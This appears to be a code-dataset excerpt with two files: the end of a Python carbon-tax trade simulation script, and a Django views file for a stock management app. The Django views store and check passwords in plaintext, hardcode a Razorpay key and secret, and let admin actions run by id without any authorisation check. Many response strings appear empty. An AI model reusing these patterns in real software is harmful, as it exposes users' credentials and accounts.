2022\n\n@author: simonl\n\"\"\"\n\nmain_path = './'\nimport sys\nsys.path.append(main_path+'lib/')\nimport solver_funcs as s\nimport data_funcs as d\nfrom tqdm import tqdm\nimport numpy as np\n# from deco import *\nimport time\nfrom time import perf_counter\nfrom multiprocessing import Pool\nfrom multiprocessing import Manager\n\ndir_num = 5\ndata_path = main_path+'data/'\nresults_path = 'results/'\n\nnumeraire_type = 'wage'\nnumeraire_country = 'USA'\n\nEEA = d.countries_from_fta('EEA')\nEU = d.countries_from_fta('EU')\nNAFTA = d.countries_from_fta('NAFTA')\nASEAN = d.countries_from_fta('ASEAN')\nAANZFTA = d.countries_from_fta('AANZFTA')\nAPTA = d.countries_from_fta('APTA')\nMERCOSUR = d.countries_from_fta('MERCOSUR')\n\n# carb_cost_list = np.append(np.linspace(0,2.5e-4,251),np.linspace(2.5e-4,1e-3,76)[1:])[46:]\ncarb_cost_list = np.linspace(0,1e-4,5)\n# eta_path = ['elasticities_agg1.csv','elasticities_agg2.csv','uniform_elasticities_4.csv']\n# sigma_path = ['elasticities_agg1.csv','elasticities_agg2.csv','uniform_elasticities_4.csv']\neta_path = ['elasticities_agg1.csv']\nsigma_path = ['uniform_elasticities_4.csv']\n# carb_cost_list = [4.6e-4]\ntaxed_countries_list = [None]\n# taxing_countries_list = [None,EU,NAFTA,ASEAN,AANZFTA,APTA,EEA,MERCOSUR,\n# ['USA'],['CHN'],\n# EEA+NAFTA,EEA+ASEAN,EEA+APTA,EEA+AANZFTA,EEA+['USA'],EEA+['CHN'],\n# NAFTA+APTA,NAFTA+MERCOSUR,\n# APTA+AANZFTA,EU+NAFTA+['CHN'],EU+NAFTA+APTA]\ntaxing_countries_list = [None]\ntaxed_sectors_list = [None]\nspecific_taxing_list = [None]\nfair_tax_list = [False]\n\ncases = d.build_cases(eta_path,sigma_path,carb_cost_list,taxed_countries_list,taxing_countries_list,\n taxed_sectors_list,specific_taxing_list,fair_tax_list)\n\nyears = [2018]\n\n# @concurrent\n# def work(baseline, data_path,results_path,dir_num, simulation_case):\n# params = d.params(data_path, **simulation_case)\n# params.num_scale_carb_cost(baseline.num, inplace = True)\n \n# if not params.fair_tax:\n# results = s.solve_E_p(params, baseline)\n \n# if params.fair_tax:\n# results = s.solve_fair_tax(params, baseline)\n \n# #compute some aggregated solution quantities to write directly in runs report\n# emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n# # d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\n\n# @synchronized\n# def run(baseline, data_path,results_path,dir_num, cases):\n# for i,simulation_case in enumerate(cases):\n# work(baseline, data_path,results_path,dir_num, simulation_case)\n\n \ndef one_run(data_tuple):\n baseline, data_path, results_path, dir_num, simulation_case = data_tuple\n print(simulation_case['carb_cost'], flush=True)\n params = d.params(data_path, **simulation_case)\n params.num_scale_carb_cost(baseline.num, inplace = True)\n \n if not params.fair_tax:\n results = s.solve_E_p(params, baseline)\n \n if params.fair_tax:\n results = s.solve_fair_tax(params, baseline)\n \n #compute some aggregated solution quantities to write directly in runs report\n emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\n return simulation_case['carb_cost']\n \n# if __name__ == '__main__': \nt1 = perf_counter()\n# for y in years:\ny=2018 \nyear=str(y)\n\nbaseline = d.baseline(year, data_path)\n\nbaseline.num_scale(numeraire_type, numeraire_country, inplace = True)\n\nbaseline.make_np_arrays(inplace = True)\n\nbaseline.compute_shares_and_gammas(inplace = True)\n\n# run(baseline, data_path,results_path,dir_num, cases)\n\n# p = Pool()\n# data = [(baseline, data_path, results_path, dir_num, simulation_case) for simulation_case in cases]\n# manager = Manager()\n# data = manager.list([(baseline, data_path, results_path, dir_num, simulation_case) for simulation_case in cases])\n# start = time.time()\n# for dat in p.map_async(one_run, data).get():\n# print(\"{} (Time elapsed: {}s)\".format(dat, int(time.time() - start)),flush=True)\n # results = p.imap_unordered(one_run, data)\nfor simulation_case in tqdm(cases):\n \n params = d.params(data_path, **simulation_case)\n params.num_scale_carb_cost(baseline.num, inplace = True)\n \n if not params.fair_tax:\n results = s.solve_E_p(params, baseline)\n \n if params.fair_tax:\n results = s.solve_fair_tax(params, baseline)\n \n #compute some aggregated solution quantities to write directly in runs report\n emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\nt2 = perf_counter()\nprint(t2-t1)", "repo_name": "todortodor/tax_mod_gh", "sub_path": "main_opti_v1_parallel.py", "file_name": "main_opti_v1_parallel.py", "file_ext": "py", "file_size_in_byte": 4977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 29, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 30, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 31, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 32, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 33, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 34, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "data_funcs.build_cases", "line_number": 55, "usage_type": "call"}, {"api_name": "data_funcs.params", "line_number": 85, "usage_type": "call"}, {"api_name": "solver_funcs.solve_E_p", "line_number": 89, "usage_type": "call"}, {"api_name": "solver_funcs.solve_fair_tax", "line_number": 92, "usage_type": "call"}, {"api_name": "solver_funcs.compute_emissions_utility", "line_number": 95, "usage_type": "call"}, {"api_name": "data_funcs.write_solution_csv", "line_number": 97, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 101, "usage_type": "call"}, {"api_name": "data_funcs.baseline", "line_number": 106, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 124, "usage_type": "call"}, {"api_name": "data_funcs.params", "line_number": 126, "usage_type": "call"}, {"api_name": "solver_funcs.solve_E_p", "line_number": 130, "usage_type": "call"}, {"api_name": "solver_funcs.solve_fair_tax", "line_number": 133, "usage_type": "call"}, {"api_name": "solver_funcs.compute_emissions_utility", "line_number": 136, "usage_type": "call"}, {"api_name": "data_funcs.write_solution_csv", "line_number": 138, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "41620805794", "text": "from datetime import datetime\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom sms.models import *\ndef mainpg(request):\n return render(request, 'homindex.html')\ndef logout(request):\n return render(request, 'homindex.html')\ndef logincode(request):\n return render(request, 'loginindex.html')\ndef logins(request):\n username = request.POST['textfield']\n password = request.POST['textfield2']\n try:\n ob = login.objects.get(username=username, password=password)\n if ob.type == 'admin':\n return HttpResponse('''''')\n elif ob.type == 'distributor':\n request.session['lid']=ob.id\n return HttpResponse('''''')\n elif ob.type == 'shopowner':\n request.session['lid'] = ob.id\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n except:\n return HttpResponse('''''')\ndef update_prod(request,id):\n ob=product.objects.get(id=id)\n request.session['prid']=id\n obb=category.objects.all()\n return render(request, 'edit_delete product.html',{'val':ob,'v':obb})\ndef update(request):\n try:\n Product_Name = request.POST['textfield']\n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n Price = request.POST['textfield4']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name, image)\n iob = product.objects.get(id=request.session['prid'])\n iob.name = Product_Name\n iob.cid = category.objects.get(id=Category)\n iob.quantity = Quantity\n iob.Tax = Tax\n iob.price = Price\n iob.image = fs\n iob.save()\n return HttpResponse('''''')\n except:\n Product_Name = request.POST['textfield']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n Price = request.POST['textfield4']\n Category = request.POST['select']\n print(Category,\"+++++++++++++++++++\")\n iob = product.objects.get(id=request.session['prid'])\n iob.name = Product_Name\n iob.cid = category.objects.get(id=Category)\n iob.quantity = Quantity\n iob.Tax = Tax\n iob.price = Price\n iob.save()\n return HttpResponse('''''')\n\ndef delete_prod(request,id):\n ob=product.objects.get(id=id)\n ob.delete()\n return HttpResponse('''''')\ndef add_prod(request):\n ob = category.objects.all()\n return render(request, 'add product.html',{'val':ob})\ndef prdct(request):\n Product_Name = request.POST['textfield'] \n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n MRP = request.POST['textfield3']\n Price = request.POST['textfield4']\n Stock = request.POST['textfield5']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n iob = product()\n iob.name=Product_Name\n iob.did=dis_registration.objects.get(lid__id=request.session['lid'])\n iob.cid=category.objects.get(id=Category)\n iob.quantity=Quantity\n iob.MRP=MRP\n iob.price=Price\n iob.stock=Stock\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\ndef ctgry(request):\n return render(request, 'category.html')\ndef addcat(request):\n Category_name = request.POST['textfield']\n GST = request.POST['textfield2']\n Discription = request.POST['textarea']\n iob=category()\n iob.category_name = Category_name\n iob.GST = GST\n iob.discription = Discription\n iob.save()\n return HttpResponse('''''')\ndef cat_list(request):\n ob=category.objects.all()\n return render(request, 'view category.html',{'val':ob})\n\n\n\ndef dis_reg(request):\n return render(request, 'reg distributor index.html')\ndef disbtr(request):\n Name = request.POST['textfield']\n Place = request.POST['textfield2']\n Email = request.POST['textfield3']\n Mobile = request.POST['textfield4']\n username = request.POST['textfield5']\n password = request.POST['textfield6']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n ob = login()\n ob.username=username\n ob.password=password\n ob.type = 'pending'\n ob.save()\n iob = dis_registration()\n iob.name=Name\n iob.location=Place\n iob.mobile_number=Mobile\n iob.email=Email\n iob.lid=ob\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\n\ndef accept(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\n\ndef reject(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''') \n\ndef admin_hom(request):\n return render(request, 'admin home page.html')\ndef bill_pg(request):\n ob=bill.objects.filter(sid__lid__id=request.session['lid'])\n return render(request, 'bill.html',{'val':ob})\ndef bill_pg2(request,id):\n ob=billdetails.objects.filter(bid__id=id)\n return render(request, 'bill2.html',{'val':ob})\ndef complt_pg(request):\n ob=complaints.objects.all()\n return render(request, 'distributor complaint.html',{'val':ob})\ndef complt_pg1(request):\n ob=complaints.objects.all()\n return render(request, 'complaint.html',{'val':ob})\ndef cmplt(request):\n ob=dis_registration.objects.all()\n return render(request, 'add complaint.html',{'val':ob})\ndef addcmplt(request):\n dis = request.POST['select']\n complaint = request.POST['textarea']\n ob=complaints()\n ob.did=dis_registration.objects.get(id=dis)\n ob.lid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.complaint=complaint\n ob.date=datetime.today()\n ob.reply='pending'\n ob.save()\n return HttpResponse('''''')\ndef viewreply(request):\n ob=complaints.objects.filter(lid__lid__id=request.session['lid'])\n\n return render(request, 'view reply.html',{'val':ob})\ndef dis_hom(request):\n ob=dis_registration.objects.get(lid__id=request.session['lid'])\n request.session['name']=ob.name\n return render(request, 'dis home page.html')\ndef feedb_pg(request):\n\n ob=feedback.objects.all()\n return render(request, 'feedback form.html',{'val':ob})\ndef fdbk(request):\n Feedback = request.POST['textarea']\n obb=feedback()\n obb.date=datetime.today()\n obb.feedback=Feedback\n obb.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n obb.save()\n return HttpResponse('''''')\ndef mng_shop(request):\n ob=dis_registration.objects.all()\n return render(request, 'shoporder.html',{'val':ob})\n\ndef user_order1(request):\n ob = category.objects.all()\n return render(request, 'userorder.html', {'val': ob})\ndef user_order2(request):\n ob = category.objects.all()\n cat=request.POST['select']\n ob1=order.objects.filter(pid__cid__id=cat,orderstatus='accept',sid__lid__id=request.session['lid'])\n return render(request, 'userorder.html', {'val': ob,'v':ob1,'c':int(cat)})\ndef user_order3(request,id):\n request.session['pid']=id\n ob1=order.objects.get(id=id)\n return render(request, 'nxt.html', {'i':ob1})\ndef order_info(request):\n btn=request.POST['button']\n qty=request.POST['qty']\n from django.db.models import Max\n cqty=order.objects.get(id=request.session['pid'])\n # cqty.stock = int(cqty.stock) - int(qty)\n if int(cqty.stock) > int(qty):\n if btn == \"NEXT\":\n bb = bill.objects.filter(status='pending',sid__lid__id=request.session['lid']).aggregate(max=Max('id'))\n print(bb,\"=================\")\n if bb['max'] is None:\n ob=bill()\n ob.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.total_amount='0'\n ob.date=datetime.today()\n ob.status='pending'\n ob.save()\n ob1=billdetails()\n ob1.pid=order.objects.get(id=request.session['pid'])\n ob1.bid=bill.objects.get(id=ob.id)\n ob1.quantity=qty\n ob1.status='ordered'\n ob1.save()\n return redirect('/user_order1')\n else:\n ob1 = billdetails()\n ob1.pid = order.objects.get(id=request.session['pid'])\n ob1.bid = bill.objects.get(id=bb['max'])\n ob1.quantity = qty\n ob1.status = 'ordered'\n ob1.save()\n return redirect('/user_order1')\n else:\n bb = bill.objects.filter(status='pending',sid__lid__id=request.session['lid']).aggregate(max=Max('id'))\n cqty = order.objects.get(id=request.session['pid'])\n cqty.stock = int(cqty.stock) - int(qty)\n cqty.save()\n if bb['max'] is None:\n ob=bill()\n ob.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.total_amount='0'\n ob.date=datetime.today()\n ob.status='pending'\n ob.save()\n ob1=billdetails()\n ob1.pid=order.objects.get(id=request.session['pid'])\n ob1.bid=bill.objects.get(id=ob.id)\n ob1.quantity=qty\n ob1.status='ordered'\n ob1.save()\n aa = bill.objects.get(id=ob.id)\n s = billdetails.objects.filter(bid__id=ob.id)\n gob = billdetails.objects.filter(bid__id=ob.id).values('pid__pid__cid').distinct()\n print(gob, \"$$$$$$$$$$$$$$$$$$$$\")\n gst = 0\n for k in gob:\n qp = category.objects.get(id=k['pid__pid__cid'])\n gst = gst + int(qp.GST)\n print(gst, \"ggggsssssssssssssssssttttttttttttttttttt\")\n tot = 0\n for i in s:\n rs = int(i.quantity) * int(i.pid.pid.MRP)\n print(rs, \"***********\")\n tot = tot + rs\n print(tot, \"==================================================\")\n request.session['tot'] = tot\n fob = bill.objects.get(id=ob.id)\n fob.total_amount = tot\n fob.save()\n request.session['bill_id'] = ob.id\n gtot=int(tot)*int(gst)/100\n famt=int(tot)+int(gtot)\n print(gtot,famt,\"=====================\")\n return render(request, 'bill_data.html', {'bid': aa.id, 'val': s, 'tot': tot,'gst':gst,'gtot':famt})\n else:\n ob1 = billdetails()\n ob1.pid = order.objects.get(id=request.session['pid'])\n ob1.bid = bill.objects.get(id=bb['max'])\n ob1.quantity = qty\n ob1.status = 'ordered'\n ob1.save()\n aa = bill.objects.get(id=bb['max'])\n s = billdetails.objects.filter(bid__id=bb['max'])\n gob = billdetails.objects.filter(bid__id=bb['max']).values('pid__pid__cid').distinct()\n print(gob, \"$$$$$$$$$$$$$$$$$$$$\")\n gst = 0\n for k in gob:\n qp = category.objects.get(id=k['pid__pid__cid'])\n gst = gst + int(qp.GST)\n print(gst, \"ggggsssssssssssssssssttttttttttttttttttt\")\n tot = 0\n for i in s:\n rs = int(i.quantity) * int(i.pid.pid.MRP)\n print(rs, \"***********\")\n tot = tot + rs\n print(tot, \"==================================================\")\n request.session['tot'] = tot\n fob = bill.objects.get(id=bb['max'])\n fob.total_amount = tot\n fob.save()\n request.session['bill_id'] = bb['max']\n gtot = int(tot) * int(gst) / 100\n famt = int(tot) + int(gtot)\n print(gtot, famt, \"=====================\")\n return render(request, 'bill_data.html', {'bid': aa.id, 'val': s, 'tot': tot,'gst':gst,'gtot':famt})\n else:\n return HttpResponse('''''')\ndef paymt(request):\n import razorpay\n fob = bill.objects.get(id=request.session['bill_id'])\n fob.status = 'paid'\n fob.save()\n amount = request.session['tot']\n client = razorpay.Client(auth=(\"rzp_test_edrzdb8Gbx5U5M\", \"XgwjnFvJQNG6cS7Q13aHKDJj\"))\n print(client)\n payment = client.order.create({'amount': str(amount) + \"00\", 'currency': \"INR\", 'payment_capture': '1'})\n return render(request,'UserPayProceed.html',{'p':payment})\ndef on_payment_success(request):\n return HttpResponse('''''')\ndef searchandviewprdcts(request):\n ob = dis_registration.objects.all()\n dis=request.POST['select']\n obb=product.objects.filter(did__id=dis)\n return render(request, 'shoporder.html', {'val': ob,'val1':obb,'d':int(dis)})\ndef odr_pg(request,id):\n request.session['prdctid']=id\n return render(request, 'oorder.html')\ndef orderproduct(request):\n qty=request.POST['textfield']\n pob=product.objects.get(id=request.session['prdctid'])\n if(int(pob.stock)>int(qty)):\n ob1=order.objects.filter(sid__lid__id=request.session['lid'])\n for i in ob1:\n ob = order.objects.get(id=i.id)\n total = int(ob.stock) * int(ob.pid.price)\n # disnt = int(ob.pid.MRP) - int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck = 1\n else:\n ck = 0\n print(ck, \"============================\")\n damt = int(famt) - int(ob.amt)\n print(damt,\"======================\")\n if(int(damt) > 5000):\n ob = order()\n ob.date = datetime.today()\n ob.pid = product.objects.get(id=request.session['prdctid'])\n ob.sid = shop_registration.objects.get(lid__id=request.session['lid'])\n ob.orderstatus = 'pending'\n ob.stock = qty\n ob.amt = '0'\n ob.save()\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n\n\ndef accept(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\ndef reject(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''')\ndef prd_list(request):\n ob=product.objects.filter(did__lid__id=request.session['lid'])\n return render(request, 'product list.html',{'val':ob})\ndef stock_info(request):\n from django.db.models import Sum\n ob = order.objects.filter(sid__lid__id=request.session['lid']).values('pid__name','pid__did__name','pid__price').order_by('pid__id').annotate(sum=Sum('stock'))\n print(ob,\"========\")\n return render(request,'stock_info.html',{'val':ob})\n# def rpt(request):\n# return HttpResponse('''''')\ndef rply_pg(request,id):\n request.session['cid']=id\n return render(request, 'reply form.html')\ndef sendreply(request):\n replys=request.POST['textfield'] \n ob=complaints.objects.get(id=request.session['cid'])\n ob.reply=replys\n ob.save()\n return HttpResponse('''''')\ndef retn(request):\n ob=order.objects.filter(pid__did__lid__id=request.session['lid'])\n return render(request,'return.html',{'v':ob})\ndef retn1(request):\n ob = category.objects.all()\n return render(request,'retrnlist.html', {'val': ob})\ndef returned(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='requested'\n ob.save()\n return HttpResponse('''''')\ndef retn2(request):\n ob = category.objects.all()\n cat = request.POST['select']\n ob1=order.objects.filter(pid__cid__id=cat,sid__lid__id=request.session['lid'])\n return render(request,'retrnlist.html', {'val': ob, 'v': ob1, 'c': int(cat)})\ndef sale_list(request):\n today=datetime.today()\n ob=bill.objects.filter(date=datetime.today(),sid__lid__id=request.session['lid']).count()\n ob1=bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year).count()\n print(ob1,\"============\")\n tob=bill.objects.filter(sid__lid__id=request.session['lid'],date__year=today.year).count()\n a=bill.objects.filter(sid__lid__id=request.session['lid'],date=datetime.today())\n tot=0\n for i in a:\n tot=tot+int(i.total_amount)\n print(tot,\"***************\")\n s = bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year)\n mob = 0\n for i in s:\n mob = mob + int(i.total_amount)\n return render(request,'sales list.html',{'v':ob,'v1':ob1,'c':tob,'tot':tot,'m':mob})\ndef send_fb(request):\n return render(request, 'sendfeedback.html')\ndef shop_hom(request):\n ob = shop_registration.objects.get(lid__id=request.session['lid'])\n request.session['sname'] = ob.name\n import numpy as np\n from django.db.models import Avg,Sum\n ob = order.objects.filter(sid__lid__id=request.session['lid']).values('pid__name', 'pid__did__name',\n 'pid__price').order_by('pid__id').annotate(sum=Sum('stock'))\n print(ob, \"========\")\n # obb = restaurant.objects.values('rname').annotate(rtg=Avg('rating')).order_by('-rating')\n c = []\n s = []\n for i in ob:\n c.append(i['pid__name'])\n s.append(float(i['sum']))\n print(c)\n print(s)\n return render(request, 'graph.html', {'v': ob, 'c': c, 's': s})\n # return render(request, 'shop home page.html')\ndef shop_reg(request):\n return render(request, 'reg shop index.html')\ndef shpownr(request):\n name = request.POST['textfield']\n location = request.POST['textfield2']\n email = request.POST['textfield3']\n mobile = request.POST['textfield4']\n username = request.POST['textfield5']\n password = request.POST['textfield6']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name, image)\n ob = login()\n ob.username = username\n ob.password = password\n ob.type = 'pending'\n ob.save()\n iob = shop_registration()\n iob.name = name\n iob.location = location\n iob.email = email\n iob.mobile_number = mobile\n iob.lid = ob\n iob.image = fs\n iob.save()\n return HttpResponse('''''')\n\ndef acceptshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='shopowner'\n ob.save()\n return HttpResponse('''''')\ndef rejectshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''')\ndef shop_add_prd(request):\n ob = shop_product.objects.all()\n return render(request, 'shop add product.html',{'val':ob})\ndef shop_prd(request):\n Product_Name = request.POST['textfield']\n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n MRP = request.POST['textfield4']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n iob = shop_product()\n iob.name=Product_Name\n iob.category=Category\n iob.quantity=Quantity\n iob.Tax=Tax\n iob.MRP=MRP\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\ndef shop_list(request):\n from django.db.models import Count\n ob=order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid']).values('sid__name','sid__location','sid__mobile_number','sid__email').annotate(dcount=Count('sid')).order_by()\n print(ob,\"==============\")\n return render(request, 'shoplist view.html',{'val':ob})\ndef view_dis(request):\n ob=dis_registration.objects.all()\n return render(request, 'view distributor list.html',{'val':ob})\ndef block_or_unblock_dis(request):\n ob=dis_registration.objects.all()\n return render(request, 'unblock distributor.html',{'val':ob})\ndef block(request,id):\n ob=login.objects.get(id=id)\n ob.type='block'\n ob.save()\n return HttpResponse('''''')\n\ndef unblock(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\ndef view_shop(request):\n ob=shop_registration.objects.all()\n return render(request, 'view shop list.html',{'val':ob})\ndef block_or_unblock_shop(request):\n ob=shop_registration.objects.all()\n return render(request, 'block shop.html',{'val':ob})\ndef blockshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='block'\n ob.save()\n return HttpResponse('''''')\ndef unblockshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='shopowner'\n ob.save()\n return HttpResponse('''''')\ndef rpt(request):\n today = datetime.today()\n ob = order.objects.filter(orderstatus='accept',date=datetime.today(), pid__did__lid__id=request.session['lid']).count()\n ob1 = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__month=today.month,\n date__year=today.year).count()\n print(ob, \"============\")\n tob = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__year=today.year).count()\n a = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date=datetime.today())\n tot = 0\n for i in a:\n tot = tot + int(i.stock)*int(i.pid.price)\n print(tot, \"***************\")\n s = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__month=today.month, date__year=today.year)\n mob = 0\n for i in s:\n mob = mob +int(i.stock)*int(i.pid.price)\n return render(request, 'sales list2.html', {'v': ob, 'v1': ob1, 'c': tob, 'tot': tot, 'm': mob})\ndef shoprpt(request):\n today = datetime.today()\n ob1 = bill.objects.filter(sid__lid__id=request.session['lid'], date__month=today.month,\n date__year=today.year).count()\n print(ob1, \"============\")\n s = bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year)\n mob = 0\n for i in s:\n mob = mob + int(i.total_amount)\n from django.db.models import Subquery,OuterRef,Count\n # annotation={'AcSum':count('pid')}\n # pd=billdetails.objects.filter(bid__date__month=today.month,bid__date__year=today.year).values('pid').annotate(**annotation).order_by('-AcSum').values('AcSum')[:1]\n pd=billdetails.objects.filter(bid__date__month=today.month,bid__date__year=today.year).values('pid__pid__name','pid__pid__image').annotate(count=Count('pid'))\n try:\n pd=pd.latest('count')\n print(pd,\"*************************\")\n except:\n return render(request, 'shopreport.html',\n {'v': ob1, 'm': mob, 'pd': 0, 'cnt': 0, 'im': 0})\n return render(request, 'shopreport.html',{'v':ob1,'m':mob,'pd':pd['pid__pid__name'],'cnt':pd['count'],'im':pd['pid__pid__image']})\ndef viewodr(request):\n ob=order.objects.filter(pid__did__lid__id=request.session['lid'])\n return render(request, 'vieworders.html',{'val':ob})\ndef paymnt_1(request,id):\n request.session['oid']=id\n ob=order.objects.get(id=id)\n total=int(ob.stock)*int(ob.pid.price)\n disnt=int(ob.pid.MRP)-int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck=1\n else:\n ck=0\n print(ck,\"============================\")\n damt=int(famt)-int(ob.amt)\n return render(request, 'paymnt1.html',{'val':ck ,'tot':int(total),'d':disnt,'gtot':famt,'gst':ob.pid.cid.GST,'pamt':ob.amt,'damt':damt})\ndef paymnt_2(request):\n amt=request.POST['amt1']\n oid=request.session['oid']\n ob=order.objects.get(id=oid)\n ob.amt=int(ob.amt)+int(amt)\n ob.save()\n total=int(ob.stock)*int(ob.pid.price)\n disnt=int(ob.pid.MRP)-int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck=1\n else:\n ck=0\n print(ck,\"============================\")\n damt=int(famt)-int(ob.amt)\n return render(request, 'paymnt1.html',{'val':ck ,'tot':int(total),'d':disnt,'gtot':famt,'gst':ob.pid.cid.GST,'pamt':ob.amt,'damt':damt})\n\ndef acceptorder(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='accept'\n ob.save()\n ob1=product.objects.get(id=ob.pid.id)\n ob1.stock=int(ob1.stock)-int(ob.stock)\n ob1.save()\n return HttpResponse('''''')\ndef rejectorder(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='reject'\n ob.save()\n return HttpResponse('''''')\ndef aprv(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='returned'\n ob.save()\n return HttpResponse('''''')\ndef rjt(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='rejected'\n ob.save()\n return HttpResponse('''''')\n# Create your views here.\n\n", "repo_name": "soorya411/Stock-Management-System", "sub_path": "stock_management_system/sms/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 27658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 27, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 85, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 109, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 147, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 153, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 165, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 